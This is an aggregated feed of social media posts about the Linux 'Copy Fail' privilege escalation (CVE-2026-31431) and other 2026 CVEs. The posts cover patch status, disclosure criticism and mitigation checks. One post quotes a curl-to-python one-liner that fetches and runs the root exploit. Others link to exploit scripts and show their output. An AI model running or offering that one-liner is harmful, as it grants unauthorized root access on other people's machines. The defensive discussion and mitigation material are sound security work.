Overview
Description
Statistics
- 103 Posts
- 564 Interactions
Fediverse
Copy Fail (CVE-2026-31431) has just been patched on Debian 13, with kernel version 6.12.85-1 from trixie (security).
The CopyFail announcement and handling is one of the least defender-supporting I think I've ever seen.
Mitigations were extremely thin at launch, and haven't improved much, and are even brittle and misleading:
https://infosec.exchange/@tychotithonus/116490466168316767
They've also largely neglected most of the value of the feedback they're getting from defenders clamoring for useful intel. The GitHub repo is full of feedback about which distros are affected or unaffected ... and a day later, none of it has been used to update the list of affected versions in the main README (except for the RHEL made-up version fix)
And this exchange is painful:
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/12
"None of us are RH people so it wasn't caught" 😐 You had weeks to do basic vetting, or find someone who would help you.
Theori seems to have intended this to be a showcase for their product. Instead, it has convinced me that I will never buy anything from them.
Edit: Will Dormann goes into more detail here, 100% agreed:
https://infosec.exchange/@wdormann/116493725294723695
If you're Linux sysadmins, better not make any plans for the long weekend... https://copy.fail/
Copy Fail (CVE-2026-31431) is a Linux kernel vulnerability that allows local unprivileged users to gain root access on affected systems.
https://linuxiac.com/copy-fail-linux-kernel-flaw-allows-local-users-to-gain-root/
It's crazy that the researchers who discovered Copy Fail only worked with the Linux Kernel Organization to patch it in the mainline kernel but didn't work with any of the major distros to make sure a patch was available before disclosing the exploit. Unless you're running a rolling distro, a dev version or a distro with short release windows, it's effectively an unpatched zeroday.
The ones most vulnerable to this are the type of systems that run on long term release kernels, not rolling releases or short release distros like Fedora.
This whole saga is a big clusterfuck for the Linux community to scramble to patch this major flaw.
#Linux #CopyFail #CVE_2026_31431 #infosec #cybersec
RE: https://infosec.exchange/@BleepingComputer/116493995434262191
Critical vulnerability!
(linux)
Almost every distro is vulnerable
CVE-2026-31431 (copyfail)
Anyone with terminal access (any user) can get root
You can test with this code
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
update quickly!
And repost so people don't sleep through it. Poke your friends who are Linux users
RedHat https://access.redhat.com/security/cve/cve-2026-31431
Debian https://security-tracker.debian.org/tracker/CVE-2026-31431
Ubuntu https://ubuntu.com/security/CVE-2026-31431
Suse: https://www.suse.com/security/cve/CVE-2026-31431.html
Arch: https://security.archlinux.org/CVE-2026-31431
Fedora fixed: https://bugzilla.redhat.com/show_bug.cgi?id=2460538
Probably Greg Kroah-Hartman or Herbert Xu would be the best source, I guess. 🤔
copy.fail (CVE-2026-31431) explained: a small Linux kernel bug with an unusually big blast radius
https://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/
The GitHub issues for the copyfail PoC script are fun, including this one, aptly titled "Golf Harder": https://github.com/theori-io/copy-fail-CVE-2026-31431/pull/5
A patched kernel is available for #Debian 13 (Trixie security): https://security-tracker.debian.org/tracker/CVE-2026-31431 #CopyFail
RE: https://mastodon.social/@Viss/116490543256385246
From my reading, this is my understanding as well. You don't have to have root, and you can modify anything in the page cache. Like ... sshd, or libpam, or anything called by a cron job that's running as root.
How can we definitively confirm this?
Raspberry Pi folks worried about CVE-2026-31431 'copy fail'.
Add this to the end of the line in /boot/firmware/cmdline.txt
```
initcall_blacklist=algif_aead_init
```
Then reboot with `sudo systemctl reboot`.
Check that it worked with
```
dmesg | fgrep 'blacklisting initcall algif_aead_init'
```
expect to see
```
[ 0.000000] blacklisting initcall algif_aead_init
```
You're now good against this issue.
No official announcement yet, but Copy Fail (CVE-2026-31431) has already been fixed in the Fedora kernels: 6.19.12. According to Red Hat / Fedora kernel tracking, "all current Fedora branches are already at or beyond kernel 6.19.12."
TL;DR - If your Fedora system is fully updated, you are already protected against Copy Fail.
Fresh gist: mitigating CVE-2026-31431 ("Copy Fail") on RHEL 8/9/10 with a tiny Ansible playbook.
It blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.
https://codeberg.org/Larvitz/gists/src/branch/main/2026/20260501-CVE-2026-31431_RHEL_Mitigation.md
#Ansible #RHEL #Linux #InfoSec #SysAdmin #DevOps #CVE #CVE_2026_31431 #copyfail
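A way to verify the `initcall_blacklist=algif_aead_init` mitigation from the Raspberry Pi and RHEL posts above, as an added example (not code from any of the quoted posts or linked projects). The function names and result strings are made up for this example; the parameter, file path and kernel log message are the ones quoted in the posts. It assumes `cmdline.txt` is read as a single line, so a parameter placed on a second line does not take effect.

```shell
#!/bin/sh
# Added example: checks for the initcall_blacklist mitigation quoted above.
# Function names and result strings are hypothetical, chosen for this example.

# blacklisted_in_cmdline CMDLINE INITCALL
# Exit 0 if INITCALL appears in an initcall_blacklist= parameter of CMDLINE.
# The parameter holds a comma-separated list, so whole entries are compared.
blacklisted_in_cmdline() (
    set -f                          # no globbing while word-splitting
    want=$2
    for tok in $1; do
        case $tok in
            initcall_blacklist=*)
                IFS=,
                for name in ${tok#initcall_blacklist=}; do
                    [ "$name" = "$want" ] && exit 0
                done
                ;;
        esac
    done
    exit 1
)

# check_cmdline_file FILE INITCALL
# Prints: applied | wrong-line | missing | unreadable
# "wrong-line" means the parameter is in the file but not on its first line.
check_cmdline_file() (
    file=$1 want=$2
    [ -r "$file" ] || { echo unreadable; exit 0; }
    if blacklisted_in_cmdline "$(head -n 1 "$file")" "$want"; then
        echo applied
    elif blacklisted_in_cmdline "$(cat "$file")" "$want"; then
        echo wrong-line
    else
        echo missing
    fi
)

# boot_log_confirms INITCALL   (kernel log text on stdin)
# Exit 0 if the log contains the blacklisting message for INITCALL.
boot_log_confirms() {
    grep -qwF "blacklisting initcall $1"
}

# report: run the three checks against the live system.
report() {
    want=algif_aead_init
    if blacklisted_in_cmdline "$(cat /proc/cmdline)" "$want"; then
        echo "running kernel: booted with $want blacklisted"
    else
        echo "running kernel: $want NOT blacklisted on this boot"
    fi
    # dmesg may be restricted, or the early message may have rotated out,
    # so this is a confirmation only; /proc/cmdline is the primary check.
    if dmesg 2>/dev/null | boot_log_confirms "$want"; then
        echo "kernel log: blacklisting message present"
    else
        echo "kernel log: no blacklisting message found"
    fi
    echo "cmdline.txt: $(check_cmdline_file /boot/firmware/cmdline.txt "$want")"
}

if [ "${1:-}" = "--report" ]; then report; fi
```

Run it with `--report` on the host. `applied` for cmdline.txt combined with a running kernel that is not blacklisted means the reboot has not happened yet.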
Linux Kernel Zero-Day “Copy Fail” (CVE-2026-31431) Grants Root Access on Every Major Distro Since 2017
#CyberSecurity
https://securebulletin.com/linux-kernel-zero-day-copy-fail-cve-2026-31431-grants-root-access-on-every-major-distro-since-2017/
Debian's patched 6.12.85+deb13-amd64 #1 SMP PREEMPT_DYNAMIC seems GTG with the PoC published here:
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
```
root@cake:~# su - eat
eat@cake:~$ vim foo.py
eat@cake:~$ cat foo.py | python3 && su
Password: su: Authentication failure
Password:
```
Bit worried about where Ubuntu is at. Ominously, their own fix announcement page seems down:
https://ubuntu.com/blog/copy-fail-vulnerability-fixes-available
Allows overwriting bytes in the shared page cache. A compromised Docker container or local process can now get full root on the host; disk integrity checks won’t see it.
**It’s patched — but not fixed — until you reboot.**
Distros are now shipping updated kernels.
Check kernel version:
uname -v
if older than Apr 22, 2026, you're likely still vulnerable
You must update the kernel package AND reboot the host. Restarting containers or services is not enough.
Treat this as critical if you self-host public services.
#Linux #InfoSec #CVE202631431 #CopyFail #SelfHosted #Docker #Kubernetes
Yet another nasty #Linux root access vulnerability (local, not remote)
Security flaw in every Linux since 2017 allowing administrator access from any user account:
https://security-tracker.debian.org/tracker/CVE-2026-31431
https://copy.fail/
$ curl https://copy.fail/exp | python3 && su
The discoverers call the flaw "Copy Fail": a 732-byte Python exploit allows local root access on many Linux distributions since 2017. CVE-2026-31431 (CVSS 7.8). Kernel update urgently recommended; workarounds: blacklist algif_aead / seccomp. 🔓🐧⚠️ #Linux #Cybersecurity #CVE2026-31431 https://www.heise.de/news/Copy-Fail-Linux-root-in-allen-grossen-Distributionen-mit-732-Byte-Python-11277590.html
1/2 Fix below
Researchers disclose "Copy Fail": a Linux privilege-escalation (CVE-2026-31431) where a 732‑byte Python PoC grants local root and affects major distros since 2017; kernel patches are available—temporary mitigation: block AF_ALG / blacklist algif_aead. Full report: https://www.heise.de/en/news/Copy-Fail-Linux-root-in-all-major-distributions-with-732-bytes-of-Python-11277657.html 🔒🐧 #Linux #infosec
1/2 Fix below
CRITICAL Vulnerability!
Almost any linux distro is vulnerable!
CVE-2026-31431 (copyfail)
any user with any access to terminal can get root
Test with this code
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
Update! And repost pls. Damn, that's fucked up.
@dangoodin Tenable has a listing of states of patching in this article: https://www.tenable.com/blog/copy-fail-cve-2026-31431-frequently-asked-questions-about-linux-kernel-privilege-escalation
https://security-tracker.debian.org/tracker/CVE-2026-31431
Patched kernel for Debian 13 Trixie
The fix for the wild CVE (CVE-2026-31431) is out for #Ubuntu
You should apply it *now*
CopyFail (CVE-2026-31431) is a critical security vulnerability in the Linux kernel. It allows a local attacker without administrator rights to gain full root access to the system.
More: https://maniabel.work/archiv/1520
#LinuxKernel #CopyFail #Exploit #BeDiS #up2date
For those wondering when #Debian will have patches for #CopyFaill, I've been following this page:
https://security-tracker.debian.org/tracker/CVE-2026-31431
Trixie just got patched. Still waiting for Bookworm.
:nugget: CVE-2026-31431 https://copy.fail/
I cannot believe this 0day happened a few days after I updated everything... good news is.. I can update with zero downtime for the most part.
If you notice a small outage, it should take a minute at max but I'll try to keep it small.
Oof, an undiscovered zero-day in the Linux kernel discovered that affects every distribution since 2017 and it's being called Copy Fail which can authenticate non-root users with a normal local account.
https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/
https://thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html
At least #Debian has fixed the problem CVE-2026-31431:
https://security-tracker.debian.org/tracker/CVE-2026-31431
Docker Engine is safe against CVE-2026-31431 now.
Patch ASAP:
https://github.com/moby/moby/releases/tag/docker-v29.4.2
@maddiefuzz Yes it is https://security-tracker.debian.org/tracker/CVE-2026-31431 but that's ok, vulnerabilities happen :).
The toot was more about the calm and demure aspect of admin-ing a Debian and using it for development. I've found it tends to pay off to learn a distro and stick with it 🤓. Debian as a desktop/dev environment is also a fantastic option
@rysiek there's the deobfuscated python code in a GitHub issue: https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/54
My guess is that they compressed it so they can get it down to the 732 byte size, as if anyone really cares about that these days.
For testing the Linux vulnerability (recently disclosed as "Copy Fail CVE-2026-31431"), I booted my notebook computer up with a live DVD, so the exploit I am testing should not get saved to the machine.
Will Linux Mint 21.2 succumb to the exploit?
My reply shows the result....
Linux computers, even fully patched, are vulnerable to the "Copy Fail CVE-2026-31431" exploit.
A temporary fix is shown on askubuntu.com.
https://askubuntu.com/questions/1566254/how-do-i-fix-cve-2026-31431-on-ubuntu-24-04-lts
@weyoun6 Then you're solid.
This post has the best details about mitigations I've seen:
#CopyFail #cve_2026_31431 I wrote about denying containers access to AF_ALG sockets with SELinux
https://blog.feistel.party/2026/04/30/deny-alg-socket-to-containers-with-selinux-to-mitigate-cve-2026-31431.html
Looking at what I'd have to patch...
And everything here is already patched... life with a rolling release.
Copy Fail: The 732-Byte Script That Roots Every Major #Linux Systems
https://ostechnix.com/copy-fail-cve-2026-31431-linux-kernel-root-exploit/
Copy Fail – CVE-2026-31431
https://piefed.social/c/selfhosted/p/2026153/copy-fail-cve-2026-31431
the line between #vulnerability #disclosure and #AI #advertisement becomes ever more blurry ....
#thereIsNoAI
#thereIsInParticularNoSustainableAI
#alsoNoReponsibleAI
CVE-2026-31431 #copyFail
The https://copy.fail/ website for the Linux CVE CVE-2026-31431 reeks of AI and is absolutely distasteful with its boasting about the severity and explainers that have no clear target audience
No warranty implied, use at your own risk. But this short C program can check if your Linux machine is still vulnerable to Copy Fail (there's also this page with python code from our friends in Estonia https://docs.hpc.ut.ee/public/cve-2026-31431/ )
Output includes "ARE available" or "NOT available"
Again: compile and run at your own risk. Don't just trust me blindly. Read the code. #CopyFail #CVE-2026-31431
```c
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

int main(void) {
    int sock;
    struct sockaddr_alg sa;

    // Prepare sockaddr_alg for AEAD/GCM
    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "aead");
    strcpy((char *)sa.salg_name, "gcm(aes)");

    // Try to create AF_ALG socket
    sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (sock == -1) {
        perror("socket(AF_ALG, aead)");
        printf("algif_aead functions are NOT available (AF_ALG socket creation failed).\n");
        return 1;
    }

    // Try to bind to AEAD/GCM
    if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
        perror("bind(AF_ALG, aead, gcm(aes))");
        printf("algif_aead functions are NOT available (bind failed).\n");
        close(sock);
        return 1;
    }

    printf("algif_aead functions ARE available (AF_ALG AEAD bind succeeded).\n");
    close(sock);
    return 0;
}
```
So this tiny piece of Python code is responsible for Copy Fail (CVE-2026-31431)? I am considering testing this on one of my own machines to see if the exploit actually works. If it does, I will post a follow-up to warn others.
Protect your Linux from CVE2026-31431 CopyFail
https://www.youtube.com/watch?v=9BGsC4lIIf4
Still, it's always impressive what hackers manage to find.
'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'
"Copy Fail — CVE-2026-31431"
OhMyDebn 3.6.3 now available with Copy Fail CVE-2026-31431 exploit mitigation, OpenCode 1.14.30, and Aether 4.15.3!
OhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI, containers, and virtualization.
linux kernel question regarding #copyfail CVE-2026-31431 I just tested a c version of the exploit (https://github.com/tgies/copy-fail-c) on a riscv64 linux 5.10.4 (milkv-duo) and get
```
[+] target: /bin/su
[+] payload: 2064 bytes (516 iterations)
socket(AF_ALG): Address family not supported by protocol
patch_chunk failed at offset 0
```
I tested it on another riscv64 SBC with a newer kernel which gained root but it seems like the exploit doesn't work on this kernel.
Copy Fail (CVE-2026-31431) is a severe logic flaw in the Linux kernel affecting almost every distribution since 2017. Patch your system immediately!
More details here: https://ostechnix.com/copy-fail-cve-2026-31431-linux-kernel-root-exploit/
#Copyfail #CVE202631431 #Pagecache #Linuxkernel #LinuxPrivilegeEscalation #Security #XintCode #TaeyangLee
@isabel lest anyone get the wrong impression, NixOS is not immune in general https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/48
Xint Code disclosed CopyFail (CVE-2026-31431) Wednesday. A logic bug in algif_aead, the kernel's crypto socket layer, from a 2017 in-place optimization. Nine years on every major Linux distribution. The exploit is 732 bytes of Python. No offsets, no race window. Static analysis missed it. Fuzzing missed it. AI-assisted review caught it. Rust would not have, this is logic, not memory. The Rust-versus-C debate distracted from where logic bugs actually live.
@mntmn looks like there’s an aarch64 port https://github.com/theori-io/copy-fail-CVE-2026-31431/pull/25
Is ubuntu.com down for anyone else? Wanted to check for #CopyFail fix information at ubuntu.com/security/CVE-2026-31431
#ubuntu #isItDownRightNow ?
Uuuuhhhhh, this is bad:
https://youtu.be/PFLpDc909yY
#copyfail #linux #cve_2026_31431
It would be interesting to see whether the copy-fail vuln (CVE-2026-31431) could be used to root an Android phone. I am a bit reluctant to install Magisk on my primary Android device, would love to see if the vuln could be an alternative. Lmao.
@ctoney Just wondering the same. Seems Ubuntu LTS remains non-fixed?
Ubuntu's grandmother Debian seems on top of things.
Tested the oft cited PoC (https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py) on patched 6.12.85+deb13-amd64 for Trixie:
```
root@cake:~# su - eat
eat@cake:~$ vim foo.py
eat@cake:~$ cat foo.py | python3 && su
Password: su: Authentication failure
Password:
```
Copy Fail (CVE-2026-31431): 732 bytes to take control of the system ( https://nfsec.pl/security/6718 ) #linux #kernel #exploit
Can someone explain to me why #copyfail was still unpatched on so many distros this morning when the blog post claims it was reported over a month ago to the kernel security team?
copy-fail-CVE-2026-31431/copy_fail_exp.py at main · theori-io/copy-fail-CVE-2026-31431 · GitHub
https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
@hillu@infosec.exchange It is my understanding that this will not work. There is a published exploit (https://github.com/rootsecdev/cve_2026_31431/blob/main/exploit_cve_2026_31431.py) that messes with the page cache for /etc/passwd to simply show your user id as 0, so a normal call to su will make you root.
@ubuntu Can you share when the updated packages to mitigate #CVE202631431 are likely to drop?
Copy-fail: local privilege escalation in every Linux distro since 2017.
It is local, but shockingly easy to exploit.
Exploit: https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
HackerNews: https://news.ycombinator.com/item?id=47952181
So... dealing with CVE-2026-31431 and I'm annoyed:
- I see vulnerable kernel versions in Debian, but MY kernel (as "uname -sr" tells me) is different
- yet my kernel on the system I tested was clearly faulty, as the exploit worked (and then didn't work when I employed the workaround)
So I need this workaround at least for now until a new kernel comes out (and I probably still won't let algif_aead insert after that anyway)
CVE-2026-31431 - crypto: algif_aead - Revert to operating out-of-place
🔗 https://vulnerability.circl.lu/vuln/CVE-2026-31431#comments
📰 Critical 'Copy Fail' Linux Flaw (CVE-2026-31431) Gives Instant Root on Major Distros
⚠️ Critical 'Copy Fail' Linux flaw (CVE-2026-31431) allows any local user to get instant root access! Affects distros since 2017 like Ubuntu, Debian, RHEL. A simple, reliable exploit exists. Patch now! #Linux #CyberSecurity #LPE
Copy Fail: this formidable Linux flaw allows gaining root access https://www.it-connect.fr/copy-fail-cve-2026-31431-linux-access-root-vulnerabilite/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Linux
Also, doesn't the OS prioritize not flushing some files from the page cache, such as the "hottest" files? Could this be leveraged by the attacker to maximize persistence? Or even take steps to ensure the file is always in cache, like regularly reading it or something?
Hot new Linux vuln just dropped:
https://copy.fail/
CVE-2026-31431
Root access & container escape
Copy Fail Linux vuln allows root access
Yesterday, Theori disclosed CVE-2026-31431, dubbed Copy Fail, a Linux kernel vulnerability that allows any unprivileged local user to gain root access on virtually every major Linux distribution shipped since 2017. In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data.
https://itnerd.blog/2026/04/30/copy-fail-linux-vuln-allows-root-access/
Let me be clear, I am not shocked that the CERT-EU article for CVE-2026-31431 has mitigation steps, while most others still haven’t acknowledged it sufficiently. https://cert.europa.eu/publications/security-advisories/2026-005/
https://www.reddit.com/r/androidroot/comments/1szlzjj/does_copy_fail_cve202631431_affect_android_devices/
you can't access af_alg on non root
Checking the #CopyFail #CVE_2026_31431 status on #AlpineLinux, again nothing heard officially from @alpinelinux but I did see this:
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/4#issuecomment-4354558846
Maybe the issue has been quietly dealt with or was never an issue to begin with? It'd be nice to know for certain.
In the last 24 hours, critical vulnerabilities have been detected affecting Linux systems, cPanel, Solana routers and Adobe Acrobat, exposing users to privilege escalation, authentication spoofing, token theft and remote code execution; in addition, flaws in Cloudflare and an advanced malware threatening scientific sectors have been reported. Discover these and more details in the following list of IT security news:
🗞️ LATEST IT SECURITY NEWS 🔒
====| 🔥 WHAT YOU NEED TO KNOW TODAY 30/04/26 📆 |====
🔒 COPY FAIL — 732 BYTES TO ROOT
A critical vulnerability has been discovered in Linux (CVE-2026-31431) that allows escalating privileges to root level without the risk of race conditions or the need to use offsets. This flaw evades on-disk file integrity tools and affects even isolated environments such as containers, posing a serious risk to the security of Linux systems. Detected by Xint Code, it is essential to update and protect your infrastructure as soon as possible. Find out more about this vulnerability and its impact here 👉 https://djar.co/3ckGrI
🌐 THE INTERNET IS FALLING DOWN, FALLING DOWN, FALLING DOWN (CVE-2026-41940 IN CPANEL AND WHM)
An authentication spoofing flaw has been identified in cPanel and WHM, two key tools for hosting management. This vulnerability allows unauthenticated attackers to obtain user sessions, including with root administrator privileges, through a complete authentication bypass. The threat compromises the security of thousands of web servers, so applying the available patches immediately is recommended. Learn how to protect your systems here 👉 https://djar.co/ScQtAV
🔗 VULNERABILITY IN THE SOLANA ROUTER
Major security flaws have been detected in the Solana network router, making it possible to drain token accounts and putting the integrity of financial transactions on this blockchain at risk. These critical vulnerabilities could compromise funds and trust in the platform, so it is essential that users and developers take urgent measures to mitigate these risks. Details and recommendations here 👉 https://djar.co/2clAA
📄 THREE VULNERABILITIES IN ADOBE ACROBAT THAT COMPROMISE SECURITY
Adobe has disclosed three critical vulnerabilities (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) that allow remote code execution and information leakage through malicious PDF files. These flaws affect popular versions such as Acrobat DC and Reader DC, putting at risk millions of users who handle digital documents. Updating to the latest version is essential to avoid intrusions and data loss. See the details and available updates here 👉 https://djar.co/Rvvu5
🏛️ CONGRESS'S STRATEGY AGAINST MASS IP BLOCKING BY LALIGA
Congress has approved a reform of the Digital Services Act to prevent mass blocking of IP addresses that affects unrelated sites in anti-piracy proceedings, seeking a balance between the protection of rights and security on the internet. This measure prevents court rulings from taking down third-party websites and promotes a safer and more regulated digital environment. Understand the scope and implications of this reform here 👉 https://djar.co/8dbV
☁️ CRITICAL VULNERABILITIES IN THE CLOUDFLARE IMPLEMENTATION
Vulnerabilities have been reported in the authorization proxies and PAC files hosted by Cloudflare that affect the management of identity security policies without the need for clients on end devices. These flaws, although technical, represent an advance in how networks are protected and require attention to avoid possible exploitation. Stay informed about how these vulnerabilities affect the security of the web environment here 👉 https://djar.co/Y6uR
🐛 DETECTING THE FAST16 MALWARE THREAT
An advanced malware, possibly developed or sponsored by a state, has been identified causing discreet sabotage by manipulating mathematical programs and physical simulations. This threat has the potential to cause serious failures, affecting sensitive scientific and technological sectors. Early detection and response are key to mitigating the damage. Learn how to protect your systems against Fast16 here 👉 https://djar.co/CN8X
Bluesky
Overview
Description
Statistics
- 25 Posts
- 21 Interactions
Fediverse
'The Internet is falling down': Critical cPanel CRLF injection vulnerability puts tens of millions of websites at risk of total compromise – hosting providers urged to apply CVE-2026-41940 patch immediately
https://www.techradar.com/pro/security/the-internet-is-falling-down-critical-cpanel-crlf-injection-vulnerability-puts-tens-of-millions-of-websites-at-risk-of-total-compromise-hosting-providers-urged-to-apply-cve-2026-41940-patch-immediately?utm_source=flipboard&utm_medium=activitypub
Posted into The Dark Side of the Internet @the-dark-side-of-the-internet-rhudaur
After the last bit of #cPanel news, I checked my own shared #WebHosting account to find that they have indeed followed the recommendations offered for a temporary fix and disabled all the admin port numbers for the console.
No sites are down, and email is working as expected... so it's just a matter of waiting for all of the fixes to roll out.
If you're a cPanel user and haven't yet checked accessibility and whether you've been upgraded, you might want to take a look.
cPanel shipped an emergency patch Tuesday for CVE-2026-41940 (CVSS 9.8) with active exploitation. Watchtowr posted a working proof-of-concept Wednesday. cpsrvd writes the session file to disk before checking the password. Inject CRLF bytes through the auth header, unsanitized data lands inside, user=root sticks, login proceeds as admin. Pre-auth file writes that store attacker data are a recurring pattern across hosting panels, not an edge case.
⚠️ If you administer, or know someone who administers, one or more hosting setups with cPanel & WHM, beware: the critical vulnerability CVE-2026-41940 ( https://vulnerability.circl.lu/vuln/CVE-2026-41940 ) allows a remote attacker to bypass authentication and obtain administrator access without credentials.
Exploitation goes through the exposed HTTPS interfaces, without user interaction, which makes it an immediate risk for servers reachable from the Internet.
This type of flaw is particularly sought after by cybercriminals and by certain APTs in Russia's orbit: takeover of hosting accounts, deployment of webshells, domain hijacking, DNS/mail modification, data theft or pivoting to other systems.
To fix as a priority: apply the fixed versions, restrict access to cPanel/WHM via VPN or IP allowlist, and check the access logs.
⬇️
https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass/
Security vulnerability in cPanel: how to protect your web server from CVE-2026-41940
#technews #cybersecurity #sysadmin #cpanel #serversecurity #webhosting
Bluesky
Overview
Description
Statistics
- 3 Posts
- 3 Interactions
Fediverse
https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero-day-cve-2026-32202
Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202 https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
Overview
- GitHub
- Enterprise Server
Description
Statistics
- 3 Posts
- 1 Interaction
Fediverse
@ben @jpmens Yes; executing commands with parameters given by the user, without any escaping. https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
📰 Critical GitHub RCE Flaw (CVE-2026-3854) Allowed Full Server Compromise via Single 'git push'
💥 Critical RCE flaw in GitHub (CVE-2026-3854) allowed repo access via a single `git push` command! Affects GitHub.com & Enterprise Server. Patches are out, but 88% of internet-facing GHES are still vulnerable. #GitHub #RCE #DevSecOps
Overview
- Progress Software
- MOVEit Automation
Description
Statistics
- 2 Posts
Fediverse
🚨 CVE-2026-4670 (CVSS 9.8): CRITICAL auth bypass in MOVEit Automation (2025.0.0 < 2025.0.9, 2024.0.0 < 2024.1.8, prior). Patch pending — restrict access & monitor advisories. No known in-the-wild exploits. https://radar.offseq.com/threat/cve-2026-4670-cwe-305-authentication-bypass-by-pri-dff96cb4 #OffSeq #MOVEit #CVE20264670
Overview
- InternLM
- lmdeploy
Description
Statistics
- 1 Post
- 1 Interaction
Overview
- Totolink
- NR1800X
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
🔥 HIGH severity: CVE-2026-7548 hits Totolink NR1800X (9.1.0u.6279_B20210910) — remote command injection via setUssd in /cgi-bin/cstecgi.cgi. Exploit is public, no patch yet. Disable remote management ASAP! https://radar.offseq.com/threat/cve-2026-7548-command-injection-in-totolink-nr1800-9109fa5c #OffSeq #infosec #vuln #IoT
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.
Read more: https://steelefortress.com/6o7x90
CyberDefense #InfoSec #Encryption #DataPrivacy #Privacy
Overview
Description
Statistics
- 1 Post
Fediverse
Today is the federal patch deadline for Apache ActiveMQ's Jolokia bug, CVE-2026-34197. Horizon3.ai traced the root cause back thirteen years. Shadowserver scanned 6,364 exposed instances April 19. Fortinet saw exploitation peak April 14. The Jolokia management API lets an attacker fetch a remote config and run OS commands as the broker. Long-deployed code does not earn trust by survival. I have audited this assumption out of every threat model I touch.
Overview
Description
Statistics
- 1 Post